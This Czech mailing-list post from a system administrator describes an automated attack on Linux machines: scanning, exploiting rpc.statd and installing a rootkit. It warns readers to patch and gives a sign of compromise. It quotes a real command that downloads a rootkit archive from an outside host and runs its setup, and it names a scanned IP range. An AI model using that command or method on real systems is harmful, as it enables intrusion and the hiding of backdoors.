utok

[Michal Chocholac]

Radek Kohout wrote:
> 
> Ale no tak, prece
> <IRONIC>
> proc by se mel nekdo zajimat zrovna o tento pocitac, proc by se neco takoveho
>  melo stat zrovna mne ...
> </IRONIC>


...treba proto, ze vetsina utoku probiha zcela automaticky. Scenar by se
dal zjednodusene popsat asi takto:

- portscannerem testujeme vybrane porty na vybranych strojich treba
(212.*.*.*:10-1000)

- na stroje provozujici zname derave sluzby, ktere umime zneuzit (treba
212.20.73.250:111), postveme skript, ktery je automaticky hackne
<noexample/>

- na hacknutych strojich provedeme male kouzlo (treba
<example>
rcp esri na xxx.yyy.69.16:/dev/ptyp/tm2.tgz ./;tar xzvf tm2.tgz;cd tm2
./setup
</example>
) ...a je vymalovano (par backdooru, zadne logy, nejaky ten trojsky kun
- [ls,ps,nestat,finger,...] a samozrejme spusteny autohack dalsi varky
IP adres)! Mimochodem, ten "setup" bych doporucoval vsem zacinajicim
administratorum -- muzu poskytnout.

Jenze nastesti i hackeri jsou omylni -- nekteri. Takze treba zapomenou
testovat pritomnost nekterych procesu (treba inetd), takze neco (treba
maly backdoor) nefunguje. Pripadne jejich trojsky /bin/ps schova vic,
nez aby si toho administrator mohl nevsimnout... nastesti.

A na zaver. Vsem, kteri neopatchovali svuj rpc.statd z RH6.2, doporucuju
zkontrolovat integritu systemu... mnou popsany priklad je totiz z
reality.

A kdybyste nahodou nasli neco jako /dev/^Madereet, tak vezte, ze vas
pocitac je hacknuty. Ale neveste hlavu, mate stesti. Byla na vas pouzita
stara (velmi mirna) verze "zazrani do systemu". Ta novejsi, kterou jsem
(u "svych" hackeru) nasel uz nachystanou, rozhodne tak mirna nebude... a
to uz fakt nezbyde nic jineho, nez preinstalovat vse :-(.

Prijemnou zabavu

--mch

Michal Chocholac
xchochol na fi.muni.cz